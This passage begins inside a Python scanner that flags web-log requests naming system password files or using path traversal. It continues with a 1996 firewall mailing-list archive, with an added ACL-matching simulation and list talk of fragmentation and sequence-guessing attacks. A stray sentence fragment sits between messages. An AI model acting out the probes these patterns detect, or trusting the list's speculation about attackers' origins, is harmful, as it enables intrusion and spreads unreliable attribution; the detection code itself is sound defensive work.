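    if PASSWORD_FILE_RE.search(decoded):
        reasons.append("references a system password file")
    if TRAVERSAL_RE.search(decoded):
        reasons.append("contains '..' path traversal")
    return decoded, rounds, reasons


def scan_log(text):
    """Parse CLF lines and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        decoded, rounds, reasons = inspect_target(m["target"])
        if reasons:
            findings.append({
                "client": m["client"],
                "when": m["when"],
                "target": m["target"],
                "decoded": decoded,
                "decode_rounds": rounds,
                "status": int(m["status"]),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["client"], f["status"], f["decoded"], "|", "; ".join(f["reasons"]))
```

The status code is kept in each finding because a 404 or 403 shows the request failed on this server, while a 200 against such a target would be the line to act on first. Blocking by source address on the basis of a single probe is a judgement call; the finding list is the input to that decision, not the decision itself.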
From firewalls-owner Fri Jul 12 17:02:46 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA17762 for firewalls-outgoing; Fri, 12 Jul 1996 16:48:58 -0700 (PDT)
Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id QAA17741 for ; Fri, 12 Jul 1996 16:48:51 -0700 (PDT)
Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id QAA23102; Fri, 12 Jul 1996 16:45:38 -0700 (PDT)
From: Don Lewis
Message-Id: <199607122345.QAA23102@salsa.gv.ssi1.com>
Date: Fri, 12 Jul 1996 16:45:38 -0700
In-Reply-To: Bill Stout
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: Bill Stout , Firewalls@GreatCircle.COM
Subject: Re: Freeware
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Jul 12, 9:03am, Bill Stout wrote:
} Subject: Re: Freeware
} If you don't know what you're doing with a freeware package,
} or if the package has not been updated recently, it is dangerous.

This is true of commercial packages as well. We happen to own some pieces of hardware containing Sparc CPUs that run SunOS 4.0.3e. Any guesses as to how many security holes there are in 4.0.3e? The hardware vendor went belly up, so no OS upgrades are available, there haven't been security patches from Sun in years, we have no access to source code to fix bugs, and we don't even have the kernel .o files so we can't build new kernels.

Good thing I'm not trying to use one of these for a firewall, eh?
--- Truck

From firewalls-owner Fri Jul 12 17:47:42 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA22373 for firewalls-outgoing; Fri, 12 Jul 1996 17:44:44 -0700 (PDT)
Received: from maryann.ebs.net (maryann.ebs.net [204.254.158.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id RAA22366 for ; Fri, 12 Jul 1996 17:44:39 -0700 (PDT)
Received: (from uucp@localhost) by maryann.ebs.net (8.7.5/8.6.9) id TAA06845 for ; Fri, 12 Jul 1996 19:46:24 -0500
Received: from gilligan.ebs.net(204.254.158.13) by maryann.ebs.net via smap (V1.3)
Date: Fri, 12 Jul 1996 19:45:56 -0500 (CDT)
From: Craig Brozefsky
To: firewalls@GreatCircle.COM
Subject: IP Masquerading and vulnerabilities
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I would like to open a discussion on attacks thru various firewall implementations, in particular Linux/FreeBSD boxes with either IP Filter or ipfirewall.c doing filtering and masquerading and then redirecting ports to local ports to handle some more complex proxies. I have a 2.0.X Linux kernel running this now and am looking at putting together a system I can use as a firewall with some reliability.

Here are some ideas of possible attacks and I would like comments on their feasibility and whether they are being performed presently and if there are fixes:

1. Fragmenting packets so that port information is passed in second packet and the filter only looks at first so it lets it go thru. I know this is a possibility with various packet filtering firewalls on the market now. Linux 2.0 has an option to re-assemble all fragmented packets going thru it before applying the filter which stops it.

2. A sequence number guessing attack (what kind of sequence number generators do the various OSs have?)

3. Stupid use of gets()

Stoopid configurations don't really count either 8)

Craig Brozefsky          cosmo@ebs.net
System Administrator     vox: 312-226-1675
EBS.NET                  fax: 312-226-1677
Network Consulting       http://www.ebs.net

From firewalls-owner Fri Jul 12 18:17:41 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA23351 for firewalls-outgoing; Fri, 12 Jul 1996 18:06:46 -0700 (PDT)
Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id SAA23324 for ; Fri, 12 Jul 1996 18:06:37 -0700 (PDT)
From: mdr@vodka.sse.att.com
Received: from ihgw2.att.com by relay6.UU.NET with SMTP
Received: from vodka.sse.att.com by ihig2.att.att.com (SMI-8.6/EMS-1.2 sol2)
Message-Id: <199607121603.LAA17766@ihig2.att.att.com>
Subject: Open Market
To: allyn@allyn.com (Mark Allyn 206-860-9454)
Date: Fri, 12 Jul 1996 12:08:59 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <199607120238.TAA04199@mark.allyn.com> from "Mark Allyn 206-860-9454" at Jul 11, 96 07:38:18 pm
X-Mailer: ELM [version 2.4 PL23-upenn2.7]
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Does anyone have any experiences to report about the Open Market product? Opinions are also welcomed.
Mark Riggins
Secure Systems Engineering
AT&T Bell Labs

From firewalls-owner Fri Jul 12 18:52:16 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA25186 for firewalls-outgoing; Fri, 12 Jul 1996 18:40:40 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id SAA25178 for ; Fri, 12 Jul 1996 18:40:33 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896)
Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3)
Message-Id: <9607130137.AA12840@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id
To: Darwin Martinez
Cc: firewalls
From: Ryan.Russell/SYBASE
Date: 12 Jul 96 18:38:05 EDT
Subject: Re: RealAudio2
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Set the client machine to use TCP instead.

Ryan

---------- Previous Message ----------
To: firewalls
cc:
From: Darwin_Martinez @ INS.COM (Darwin Martinez) @ smtp
Date: 07/12/96 01:08:12 PM
Subject: RealAudio2

All:

I've upgraded FW-1 to ver 2.1 for supporting real audio 2. I see the "radio" tcp connect go out, but FW-1 is blocking the return udp service. My rulebase is set up to allow tcp / udp real audio, but I'm still blocking it.

Anyone using FW-1 & real audio? If so, I'd appreciate any suggestions.

Thanks in advance.

------------------------------------------------------------------------
Darwin L. Martinez                  Email: darwin_martinez@ins.com
Network Systems Engineer            Site #: 404-843-5954
International Network Services      Pager: 800-INS-1-INS
Atlanta Office
"To run with the big dogs, you gotta get off the porch!"
------------------------------------------------------------------------

From firewalls-owner Fri Jul 12 19:02:45 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA26533 for firewalls-outgoing; Fri, 12 Jul 1996 18:58:56 -0700 (PDT)
Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id SAA26526 for ; Fri, 12 Jul 1996 18:58:49 -0700 (PDT)
Received: by mail.rc.toronto.on.ca with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0)
Message-ID:
From: Russ
To: "'mdr@vodka.sse.att.com'"
Cc: "'Firewalls@GreatCircle.COM'"
Subject: RE: Web Server on DMZ
Date: Fri, 12 Jul 1996 21:53:32 -0400
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Bob,

Could you explain to me how you get your two-firewall configuration to provide backup services in the event that one of them fails? Are you suggesting that either of the two firewalls fail open?

In simple terms, if Firewall #1 (exposed to the Internet) is configured;

- to route packets from the Internet to Firewall #2 and/or Application Servers
- to route packets from Firewall #2 and/or Application Servers

and Firewall #2 (exposed to the internal net) is configured;

- to route packets from the internal net to Firewall #1 and/or Application Servers
- to route packets from Firewall #1 and/or Application Servers

Then how does this configuration work if either of these Firewalls die? If Firewall #1 dies closed (as it should), then Firewall #2 has nowhere to send or receive packets from, and vice versa.

I fail to see how having two firewalls could be configured to add anything to the security model while affording you any form of redundancy.

Cheers,
Russ
...running MS Exchange Server 4.0 on NT 4.0, the future is here now.
From firewalls-owner Fri Jul 12 19:17:43 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA27157 for firewalls-outgoing; Fri, 12 Jul 1996 19:06:36 -0700 (PDT)
Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id TAA27137 for ; Fri, 12 Jul 1996 19:06:27 -0700 (PDT)
Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id WAA17175; Fri, 12 Jul 1996 22:03:18 -0400 (EDT)
Received: from localhost (proberts@localhost) by clark.net (8.7.1/8.7.1) with SMTP id WAA25413; Fri, 12 Jul 1996 22:03:16 -0400 (EDT)
X-Authentication-Warning: clark.net: proberts owned process doing -bs
Date: Fri, 12 Jul 1996 22:03:16 -0400 (EDT)
From: "Paul D. Robertson"
To: Ginger
cc: firewalls@GreatCircle.COM
Subject: Re: Who should Handle Data Encryption?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 12 Jul 1996, Ginger wrote:

> Would anyone like to share your experience regarding secure data transfer on
> the Internet/Intranet:
>
> Should our network people set up secure (i.e., data encryption)
> communication channels for all protocols, or should mainly install a file
> encryption utility and let the user decide which application is necessary
> to be encrypted?

Secure communications channels, and secure data storage can be two different things totally. Securing the channel doesn't secure the machine, unless the machine *only* accepts encrypted data. Even then, physical security of the machine is paramount. Securing the data at the application level only makes sense if you can ensure that it will be transmitted that way between machines.
Issues to consider:

Key change: Application users are going to need a lot of education to ensure that key change intervals are correct, and that key management is handled properly (Can they deal with good password management? If not, forget key handling).

Key escrow: Will your CFO walk off the job with the only copy of the key for your financials at a really bad time? Re-keying a communications channel can be much easier to recover from than trying to recover applications data.

Compartmentalization: If the communications channel is encrypted, then anyone with the key gets _all_ the data in that channel, not just one application. Also, the network folks hold all the cookies. While this is generally true of a clear channel, depending on the nature of the data, it could be important to you.

I'd seriously consider both options. Key application data could be encrypted at the application level, but be cautious about keys, both too many people having them, and not enough. Encrypting all network traffic on key segments, or across less secure paths gives better security against intrusion, data sniffing, and the like. Just like a firewall, you'll want to eliminate, or minimize (depending on the risk you are willing to assume) the paths around the encrypted channel.

Calculating good key change intervals for bulk channel encryption may be difficult, but if you're going to a lot of traffic across them, be aware of their vulnerability to differential attacks, and in the case of intranet traffic using normal protocols, known plaintext attacks (e.g. the string 'http://').

Finally, though encryption is a _very_good_thing_ [tm], it isn't a magic bullet, and you don't lose all your vulnerabilities, so don't drop your guard down. Also, key intervals, key change mechanisms, algorithm implementation, key length, and key invalidation are all new potential vulnerabilities that you should be aware of managing.

Hope this helps some.
Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
PSB#9280

From firewalls-owner Fri Jul 12 20:48:15 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA02527 for firewalls-outgoing; Fri, 12 Jul 1996 20:45:40 -0700 (PDT)
Received: from io.org (io.org [198.133.36.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id UAA02520 for ; Fri, 12 Jul 1996 20:45:34 -0700 (PDT)
Received: from eagle.net4.io.org (eagle.net4.io.org [199.166.239.227]) by io.org (8.6.12/8.6.12) with SMTP id XAA02275; Fri, 12 Jul 1996 23:42:18 -0400
Date: Fri, 12 Jul 1996 23:42:18 -0400
Message-Id: <199607130342.XAA02275@io.org>
X-Sender: jeffm@io.org
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@greatcircle.com
From: Jefferson Mousseau
Subject: Ciscos & HTTP Config
Cc: 102547.232@CompuServe.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Recently we were configuring a Cisco 2503 to allow http on port 80 but when we tested it, nothing would go through. Next we opened up the router and were able to access the web server (MS IIS). I recalled that many web browsers use up to 4 ports and according to Netscape, more port utilization is intended in later releases. Finally we configured the router to allow http from port 80 - 90 and tests allowed us to access the web server.

Oddly, our firewall is FireWall-1 2.0 and it knew (as if it can think!) to keep more than port 80 open.

I was wondering if anyone else has encountered this and what range of ports they opened on the Cisco for incoming access? Also, what range of ports does FireWall-1 open for http?
Regards
Jeff Mousseau
jeffm@io.org

From firewalls-owner Fri Jul 12 21:02:43 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA02712 for firewalls-outgoing; Fri, 12 Jul 1996 20:50:47 -0700 (PDT)
Received: from cuugnet.cuug.ab.ca (cuugnet.cuug.ab.ca [206.75.222.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id UAA02705 for ; Fri, 12 Jul 1996 20:50:41 -0700 (PDT)
Received: by cuugnet.cuug.ab.ca (AIX 4.1/UCB 5.64/4.03-CUUG-02)
Date: Fri, 12 Jul 1996 21:47:39 -0600
From: ingoldsb@cuug.ab.ca (Terry Ingoldsby 630-5931)
Message-Id: <9607130347.AA35632@cuugnet.cuug.ab.ca>
To: firewalls@greatcircle.com
Subject: Canadian companies also limited from exporting encryption?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>Date: Thu, 11 Jul 1996 13:09:03 -0500
>From: Jim Minie
>Subject: RE: CISCO network level encryption & key lengths
>Canadian companies whose encryption methodologies can't be regulated by the
>U.S. State Department are doing a brisk business within the U.S. and
>maintaining that level of security throughout the world.
>I.e. Nortel Entrust. Maybe not falling in line with Cisco, but an
>alternate... Have you considered Virtual Private Networking via a firewall
>system to create the distinct user groups? It's just an idea. If you're
>talking individual users the cost would be way out of line.

Are you sure this is correct? I thought that Canada got access to US encryption technology by agreeing to abide by the US export restrictions - but maybe that only applies to technology imported from the states. However, I was told that Nortel Entrust is only allowed to do international encryption *if* the key server is kept in North America. Can anyone confirm/refute this?

- Terry Ingoldsby
ingoldsb@dcexpert.ab.ca
it happen this year? Probably not.
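The Cisco question from Jeff Mousseau above turns on how a stateless access list sees a browser's parallel connections: every one of them is to destination port 80 and differs only in the client's ephemeral source port, so nothing beyond port 80 has to be opened toward the server, and replies to connections that inside users opened outward are admitted by the `established` keyword (which matches packets with the ACK or RST bit set) rather than by opening a range of server-side ports. The following is an added Python simulation of that matching written for this page; it is neither Cisco IOS code nor FireWall-1's, and the rule model, addresses and port numbers are constructed for illustration.

```python
"""Stateless access-list matching, simulated: why a web server behind a
router filter needs only destination port 80 open however many
connections a browser makes. Added example; addresses are constructed."""
from dataclasses import dataclass
from typing import Optional

WEB = "198.51.100.10"   # constructed address of the DMZ web server
INSIDE = "10.0.0.25"    # constructed address of an inside workstation


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False
    ack: bool = False


@dataclass(frozen=True)
class Rule:
    action: str                  # "permit" or "deny"
    dst: str                     # "any" or a host address
    dport: Optional[int] = None  # None matches any destination port
    established: bool = False    # match only packets carrying ACK (replies)


def matches(rule: Rule, pkt: Packet) -> bool:
    if rule.dst != "any" and rule.dst != pkt.dst:
        return False
    if rule.dport is not None and rule.dport != pkt.dport:
        return False
    if rule.established and not pkt.ack:
        return False
    return True


def evaluate(acl, pkt: Packet) -> str:
    """First matching rule wins; every access list ends in an implicit deny."""
    for rule in acl:
        if matches(rule, pkt):
            return rule.action
    return "deny"


# Constructed inbound list for the Internet-facing interface:
#   permit tcp any host WEB eq 80   -> client requests to the web server
#   permit tcp any any established  -> replies to connections inside users opened
INBOUND_ACL = [
    Rule("permit", WEB, 80),
    Rule("permit", "any", established=True),
]


def browser_connections(client, server, count, first_port=1025):
    """The SYNs a browser sends when it opens `count` parallel connections:
    all go to port 80; only the client's ephemeral source port differs."""
    return [Packet(client, first_port + i, server, 80, syn=True) for i in range(count)]


def demo():
    """Run representative packets through the list and collect the verdicts."""
    return {
        # four browser connections, as in the post, all land on port 80
        "browser_to_web": [evaluate(INBOUND_ACL, p)
                           for p in browser_connections("192.0.2.5", WEB, 4)],
        # a new connection to any other server port is refused
        "probe_port_85": evaluate(INBOUND_ACL, Packet("192.0.2.5", 1029, WEB, 85, syn=True)),
        # reply from an outside web server to an inside browser: ACK set, so permitted
        "reply_to_inside": evaluate(INBOUND_ACL, Packet("203.0.113.80", 80, INSIDE, 1030, ack=True)),
        # same addresses but a fresh SYN from outside: no ACK, so denied
        "syn_to_inside": evaluate(INBOUND_ACL, Packet("203.0.113.80", 80, INSIDE, 1030, syn=True)),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:16s} {verdict}")
```

The caveat the simulation makes visible is that `established` inspects flag bits, not connection state: any packet with ACK set satisfies it, whether or not a handshake ever happened. A stateful product keeps a table of connections it has seen and admits only replies that belong to one, which is the difference Jeff noticed between the router and FireWall-1.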
From firewalls-owner Fri Jul 12 21:32:40 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA04017 for firewalls-outgoing; Fri, 12 Jul 1996 21:14:21 -0700 (PDT)
Received: from kimberlite.wwonline.com (kimberlite.wwonline.com [206.47.108.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id VAA03991 for ; Fri, 12 Jul 1996 21:14:10 -0700 (PDT)
Received: from kimberlite.wwonline.com (ts04p14.wwonline.com [206.47.108.191]) by kimberlite.wwonline.com (8.7.5/8.7.2) with SMTP id AAA12526 for ; Sat, 13 Jul 1996 00:09:45 -0400 (EDT)
Date: Sat, 13 Jul 1996 00:09:45 -0400 (EDT)
Message-Id: <199607130409.AAA12526@kimberlite.wwonline.com>
X-Sender: bhalla@wwonline.com
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@GreatCircle.COM
From: N Bhalla
Subject: Encryption .. May be i am asking at the wrong place
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

I was wondering: I have read and heard a lot about pgp being the best package for data encryption, which I do believe as well..

But why are people still using other data encryption packages ..
Why can't the unix password etc be also encrypted in PGP?
Why can't the cellular phones whose numbers are being tracked down by scanners not be encrypted in pgp ..

Am I just imagining the power of pgp or is it so powerful ..

Why can't we have pgp for firewalls .. etc ..

Please pardon me for asking in the wrong place ...
Thanks

From firewalls-owner Fri Jul 12 21:45:20 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA02849 for firewalls-outgoing; Fri, 12 Jul 1996 20:56:37 -0700 (PDT)
Received: from orion.webspan.net (orion.webspan.net [206.154.70.41]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id UAA02842 for ; Fri, 12 Jul 1996 20:56:31 -0700 (PDT)
Received: from orion.webspan.net (scanner@orion.webspan.net [206.154.70.41]) by orion.webspan.net (8.7.5/8.6.12) with SMTP id XAA02909; Fri, 12 Jul 1996 23:51:59 -0400 (EDT)
Date: Fri, 12 Jul 1996 23:51:58 -0400 (EDT)
From: Scanner
To: Rob Sansom
cc: firewalls@GreatCircle.COM
Subject: Re: POP exploits
In-Reply-To: <199607121541.IAA03298@apu.connectix.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 12 Jul 1996, Rob Sansom wrote:

> I occasionally get a burst of TCP packets to port 110 on our web server,
> which does not run a pop 3 server or any such thing. Here's a good
> example:
> I know it's not an employee trying to collect their mail, since all of
> these connection attempts have come from places like Malaysia, Washington

Hmm, Malaysia? Any gov.my? Or any other .my? I know that there are a lot of machines hacked in .my and I know one such person who has attempted with failure over and over and over again to attack my popper port which is wrapped and I can't figure out what the hell he's doing after 20 attempts of getting refused that comes from many malaysia sites. I'm gonna say that most of the connects I get from .my are hack attempts.

Just thought I'd pass that on.

--
===================================| Webspan Inc., ISP Division.
FreeBSD 2.1.0 is available now!    | Phone: 908-367-8030 ext. 126
-----------------------------------| 500 West Kennedy Blvd., Lakewood, NJ-08701
Turning PCs into Workstations      | E-Mail: scanner@webspan.net
http://www.freebsd.org             | SysAdmin / Network Engineer / Security
===================================| Member BSDNET team! http://www.bsdnet.org

From firewalls-owner Sat Jul 13 01:21:25 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA16110 for firewalls-outgoing; Sat, 13 Jul 1996 01:08:38 -0700 (PDT)
Received: from sic.se (mailbox.sic.se [194.236.7.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id BAA16102 for ; Sat, 13 Jul 1996 01:08:30 -0700 (PDT)
Received: from pamela.sic.se (pamela.sic.se [194.236.7.44]) by sic.se (8.7.5/8.7.2) with SMTP id KAA01626; Sat, 13 Jul 1996 10:03:12 +0200 (MET DST)
X-Mailer: InterCon tcpCONNECT4 4.0b26 (Macintosh)
MIME-Version: 1.0
Message-Id: <9607131005.AA26848@pamela.sic.se>
Date: Sat, 13 Jul 1996 10:05:26 +0100
From: "Stefan Berg"
To: "Bruce M."
Cc: firewalls@GreatCircle.com
Subject: Re: Freeware
Content-Type: Text/Plain; charset=US-ASCII
Content-Disposition: Inline
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Bruce M. wrote:
> On Fri, 12 Jul 1996, Stefan Berg wrote:
>
> > My experience with freeware or any other firewall software for
> > that matter is that it very much depends on _configuration_ rather
> > than the quality of the software.
> > I mean, what's the use of a super_duper_mega_expensive_and_
> > great firewall if you don't know how to set it up in a secure fashion?
>
> True. But what is the good of a simple proxy server if it won't
> let you implement the types of restrictions and privileges that you
> want to allow? Basically, you need a precise mix of both
> good configuration and good quality. Some people aren't willing to
> pay for both.

Good point. A firewall should be like a computer --> a _helpful_ tool, not a limiting one.
/Stefan

--
_______________________________________________________
Stefan Berg
ISDN Group of Sweden / Svenska InternetCentralen
Phone: +46-8-667 7010    Fax: +46-8-667 0610
E-mail: stefan@sic.se    WWW: http://www.isdn.se/ http://www.sic.se/
_______________________________________________________
Recursive; adj. see Recursive

From firewalls-owner Sat Jul 13 02:17:52 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA21889 for firewalls-outgoing; Sat, 13 Jul 1996 01:59:26 -0700 (PDT)
Received: from mdisnz.nz.mdis.com ([202.36.234.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id BAA21874 for ; Sat, 13 Jul 1996 01:59:11 -0700 (PDT)
Received: from x86.nz.mdis.COM by mdisnz.nz.mdis.com with SMTP id AA03851
Received: by x86.nz.mdis.com (SMI-8.6/SMI-SVR4)
Date: Sat, 13 Jul 1996 20:51:38 +1200
From: geofft@nz.mdis.com (Geoff Tribble)
Message-Id: <199607130851.UAA08773@x86.nz.mdis.com>
To: firewalls@greatcircle.com
Subject: Re: Dirty Dogs
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Interestingly, traceroutes to machines you would think were the same net end up in different places! Still points to AOL at the ISP.

> > This person seems to have covered their tracks pretty well. Any ideas on
> tracking them??
# traceroute 152.169.232.1
19 inet3-gw.blue.aol.com (198.81.0.43) 490 ms 460 ms 500 ms
20 inet5-gw.blue.aol.com (152.163.15.2) 470 ms 430 ms 430 ms
21 inet6-gw.blue.aol.com (152.163.15.26) 460 ms 530 ms 440 ms
22 inet15-gw.blue.aol.com (152.163.15.77) 550 ms 550 ms 560 ms
23 iptr-r3.proxy.aol.com (152.163.193.125) 630 ms 630 ms 550 ms
24 152.169.232.1 (152.169.232.1) 450 ms 610 ms 450 ms

#traceroute 152.169.232.79
19 inet3-gw.blue.aol.com (198.81.0.43) 430 ms 620 ms 440 ms
20 inet5-gw.blue.aol.com (152.163.15.2) 430 ms 440 ms 430 ms
21 inet6-gw.blue.aol.com (152.163.15.26) 440 ms 480 ms 440 ms
22 inet15-gw.blue.aol.com (152.163.15.77) 530 ms 460 ms 500 ms
23 iptr2-r3.proxy.aol.com (152.163.193.60) 460 ms 630 ms 440 ms
24 152.163.191.121 (152.163.191.121) 450 ms 490 ms 550 ms
25 152.163.191.121 (152.163.191.121) 490 ms !H 520 ms !H 450 ms !H

And from nslookup

> 152.163.191.121
Name: ipt-i1.blue.aol.com
Address: 152.163.191.121

Looks like a dial-in port at AOL but does anyone know what 152.169.232.1 is??
Geoff Tribble
McDonnell Information Systems
Auckland
New Zealand

From firewalls-owner Sat Jul 13 05:17:45 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA27426 for firewalls-outgoing; Sat, 13 Jul 1996 05:09:56 -0700 (PDT)
Received: from fire1.sprintlink.net (fire1.sprintlink.net [206.229.244.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA27419 for ; Sat, 13 Jul 1996 05:09:50 -0700 (PDT)
Received: from fire2.int.sprintlink.net ([206.229.244.28]) by fire1.sprintlink.net
Received: from athens.int.sprintlink.net ([208.0.2.203]) by fire2.int.sprintlink.net
Received: (from rquinn@localhost) by athens.int.sprintlink.net (8.7.5/8.7.3) id IAA04933 for Firewalls@GreatCircle.COM; Sat, 13 Jul 1996 08:06:38 -0400 (EDT)
From: Rob Quinn
Message-Id: <199607131206.IAA04933@athens.int.sprintlink.net>
Subject: Please trim your articles
To: Firewalls@GreatCircle.COM
Date: Sat, 13 Jul 1996 08:06:38 -0400 (EDT)
Reply-To: rquinn@sprint.net
In-Reply-To: <199607130404.VAA03298@miles.greatcircle.com> from "Firewalls-Digest" at Jul 12, 96 09:04:32 pm
X-Alternate-Address: rjq@phys.ksu.edu
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> From: someone on the firewalls list
> Subject: Re: Dirty Dogs
[11 lines of new text]
[64 lines quoted entirely from the last article, with no new comments]

When replying to an email/post, please DO NOT quote the entire article at the bottom of your own email! We're all on the list, and we've all seen it ourselves. If you're replying to specific parts of the email, then quote those lines only.

If you're wondering why you should care (or change), try subscribing to the firewalls-digest. Your 11 lines of new text are totally lost in the noise you are creating. You might have something new/good to say, but it's too much trouble for us to look for it.
Others might know something important to you, but you'll never hear about it because most people don't want to take the effort to search out what you've written.

--
| It must be true,      Rob Quinn                  |
| I saw it              (703)904-2125              |
| on tv.                rquinn@sprint.net          |
|                       Sprint Corporate Security  |

From firewalls-owner Sat Jul 13 08:05:54 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA01738 for firewalls-outgoing; Sat, 13 Jul 1996 07:55:32 -0700 (PDT)
Received: from dfw-ix12.ix.netcom.com (dfw-ix12.ix.netcom.com [206.214.98.12]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA01731 for ; Sat, 13 Jul 1996 07:55:27 -0700 (PDT)
Received: from (jgeuin@tal-fl1-03.ix.netcom.com [205.184.150.35]) by dfw-ix12.ix.netcom.com (8.6.13/8.6.12) with SMTP id HAA17334; Sat, 13 Jul 1996 07:50:43 -0700
Date: Sat, 13 Jul 1996 07:50:43 -0700
Message-Id: <199607131450.HAA17334@dfw-ix12.ix.netcom.com>
From: jgeuin@ix.netcom.com (James L. Geuin)
Subject: Re: Encryption .. May be i am asking at the wrong place
To: N Bhalla
Cc: jgeuin@netcom.com
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

You wrote:
>
>Hi,
>
>I was wondering: I have read and heard a lot about pgp being the best package
>for data encryption, which I do believe as well..
>
>But why are people still using other data encryption packages ..
>Why can't the unix password etc be also encrypted in PGP?
>Why can't the cellular phones whose numbers are being tracked down by
>scanners not be encrypted in pgp ..
>
>
>Am I just imagining the power of pgp or is it so powerful ..
>
>Why can't we have pgp for firewalls .. etc ..
>
>Please pardon me for asking in the wrong place ...
>
>
>Thanks
>
>

I am also interested in encryption. I have a TCP/IP carrier that is generated by an IPC (interprocess controller) from a UNISYS A series main frame. I travel to around 700 sites, via a PVC frame relay connection.
I don't want to encrypt everything, just one or two applications. Have you heard of anything that I could use?

Thanks,
R/Jim Px

From firewalls-owner Sat Jul 13 08:17:47 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA02288 for firewalls-outgoing; Sat, 13 Jul 1996 08:05:52 -0700 (PDT)
